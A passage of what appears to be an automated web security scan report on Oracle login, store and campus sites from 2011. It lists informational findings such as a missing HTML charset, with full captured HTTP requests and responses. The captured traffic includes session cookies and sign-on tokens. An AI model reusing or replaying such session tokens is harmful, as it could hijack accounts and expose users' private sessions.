Cookie: JSESSIONID=4b6c18f94d59bd512084b9e22617766b4768ed0eaa374f5913aa8ef8b3406d22.e3ePbhaKb3qRe3yMb3aMax0Mb40; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; BIGipServergsiap_irecruitment_http=1527616141.5150.0000; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; oracle.uix=0^^GMT-5:00^p; s_cc=true; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Expires: Sun, 23 Oct 2011 04:20:47 GMT
Content-Type: text/html
Last-Modified: Wed, 03 Jan 2007 17:51:53 GMT
Connection: Keep-Alive
Keep-Alive: timeout=60, max=999
Content-Length: 102
Date: Sun, 16 Oct 2011 04:20:47 GMT
Accept-Ranges: bytes

<!-- $Header: blank.html 120.0 2005/05/07 06:43:35 appldev noship $ -->
<html>
<body>
</body>
</html>

15.58. https://login.oracle.com/oam/server/sso/auth_cred_submit  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /oam/server/sso/auth_cred_submit

Request

POST /oam/server/sso/auth_cred_submit HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Content-Length: 2579
Cache-Control: max-age=0
Origin: https://login.oracle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://login.oracle.com/mysso/signon.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; s_sq=%5B%5BB%5D%5D; s_pers=%20gpv_p24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Acart%253A7881107130450135%7C1318853904888%3B%20gpw_e24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Acart%253A7881107130450135%7C1318853904890%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doracleglobal%252Coraclestore%253D%252526pid%25253Dostore%2525253A%25252520your%25252520shopping%25252520cart%252526pidt%25253D1%252526oid%25253Djavascript%2525253Aapex.submit%25252528%25252527CHECKOUT%25252527%25252529%252526ot%25253DA%2526oraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; BIGipServerloginadc_oracle_com_http=2869727885.16927.0000

v=v1.4&request_id=1464845504205588723&OAM_REQ=VERSION_4%7EKk%252fxScRUpoZ7Ai84IFFZnAZ9XxsM1Ii8iVy4UnLMUA09vIONA1373ptUbdDbWK1I3N9QNYGFUjCSDxp0GzHunzGq%252fvmBT1AU8oHT9wFSl9DhSVwOc2bfDcq7LD59f1pwdrf60S
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 11:48:14 GMT
X-ORACLE-DMS-ECID: 0000JCHhU_b6MQK6EVaAUS1EaweP001pGi
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:48:14 GMT; path=/
Content-Length: 2584

<html><body onLoad="document.myForm.submit()"><noscript><p>JavaScript is required. Enable JavaScript to use OAM Server.</p></noscript><form action="https://login.oracle.com/mysso/signon.jsp" method="p
...[SNIP]...

15.59. https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /pls/orasso/orasso.wwsso_app_admin.ls_login

Request

GET /pls/orasso/orasso.wwsso_app_admin.ls_login?Site2pstoreToken=v1.2~656BF073~F67CCD99F8206924258D38DB351220E7A87F5CFA2A247E104D45F3F4AEEA543333D56FD366F29DB82FD299833B34B055A2C5E8B8B9A2C0B53FD5A340B222C52BCD9FB3F943986E3C519C3179851D7BFE59069DAB23D915BE79162A1B4BF967143AEB61184B94E138006D6FFE796DE511124E75F31EE38071343B458D610C13DE2ADFEE1D98673636EF6AD33794DBCC4C829C2520F480DE660CA3405DF5A18EE7B5918EFA7B6C07474FED018F4130EF14C5A156B204A46DD4CCCE5961688BD1BE8B3B6464B6A8558C65A283EF303875B11069F113634DCD5DF6192FFF776E76A04CFA73900D45393D18CFE0B1B8694866 HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.oracle.com/index.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 11:44:38 GMT
X-ORACLE-DMS-ECID: 0000JCHgdlx6MQK6EVaAUS1EaweP001nsI
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:38 GMT; path=/
Content-Length: 3313

<html><body onLoad="document.myForm.submit()"><noscript><p>JavaScript is required. Enable JavaScript to use OAM Server.</p></noscript><form action="https://login.oracle.com/mysso/signon.jsp" method="p
...[SNIP]...

15.60. https://shop.oracle.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://shop.oracle.com
Path:   /

Request

GET / HTTP/1.1
Host: shop.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.oracle.com/us/products/applications/peoplesoft-enterprise/hcm/index.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; gpv_p24=http%3A//www.oracle.com/us/education/selectcountry-new-079003.html; s_cc=true; gpw_e24=http%3A%2F%2Fwww.oracle.com%2Fus%2Fproducts%2Fapplications%2Fpeoplesoft-enterprise%2Fhcm%2Findex.html; s_sq=oraclecom%2Coracleglobal%3D%2526pid%253Docom%25253Aen-us%25253A%25252Fproducts%25252Fapplications%25252Fpeoplesoft-enterprise%25252Fhcm%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Astore%25253Astorespareparts%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 11:47:02 GMT
Server: Oracle-Application-Server-10g
Last-Modified: Sat, 26 Mar 2011 14:58:47 GMT
ETag: "929d05-59-4d8dff27"
Accept-Ranges: bytes
Content-Length: 89
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

<head>
<meta HTTP-EQUIV=Refresh CONTENT="0; URL=/pls/ostore/f?p=dstore:home:0">
</head>

15.61. https://shop.oracle.com/pls/ostore/f  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://shop.oracle.com
Path:   /pls/ostore/f

Request

GET /pls/ostore/f?p=dstore:home:0 HTTP/1.1
Host: shop.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://shop.oracle.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; gpv_p24=http%3A//www.oracle.com/us/education/selectcountry-new-079003.html; s_cc=true; gpw_e24=http%3A%2F%2Fwww.oracle.com%2Fus%2Fproducts%2Fapplications%2Fpeoplesoft-enterprise%2Fhcm%2Findex.html; s_sq=oraclecom%2Coracleglobal%3D%2526pid%253Docom%25253Aen-us%25253A%25252Fproducts%25252Fapplications%25252Fpeoplesoft-enterprise%25252Fhcm%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Astore%25253Astorespareparts%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 11:47:03 GMT
Server: Oracle-Application-Server-10g
Vary: Host
Content-Length: 437
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<html>
<head><script type="text/javascript">
function detectTimeZone(){
var lGmtHours = -(new Date()).getTimezoneOffset();
var lHours = parseInt(lGmtHours/60);
var lMinutes = lGmtHours%60;
window.loca
...[SNIP]...

16. HTML does not specify charset  previous  next
There are 7 instances of this issue:

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.


16.1. https://campus.oracle.com/campus/gwt/otn.todo.TodoApp/3C4F2E3489E5DDA185EB977FEEAA0A3B.cache.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://campus.oracle.com
Path:   /campus/gwt/otn.todo.TodoApp/3C4F2E3489E5DDA185EB977FEEAA0A3B.cache.html

Request

GET /campus/gwt/otn.todo.TodoApp/3C4F2E3489E5DDA185EB977FEEAA0A3B.cache.html HTTP/1.1
Host: campus.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://campus.oracle.com/campus/gwt/otn.todo.TodoApp/TodoApp.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=https%3A//campus.oracle.com/campus/HR/global_main.html; gpw_e24=https%3A//campus.oracle.com/campus/HR/global_main.html; s_sq=oraclecampus%3D%2526pid%253Dhttps%25253A//campus.oracle.com/campus/HR/global_main.html%2526oid%253Dhttps%25253A//campus.oracle.com/campus/HR/zealand_main.html%2526ot%253DA; _csoot=1318854620551

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 12:35:28 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Last-Modified: Fri, 07 Oct 2011 13:28:07 GMT
Accept-Ranges: bytes
Content-Length: 456625
Keep-Alive: timeout=15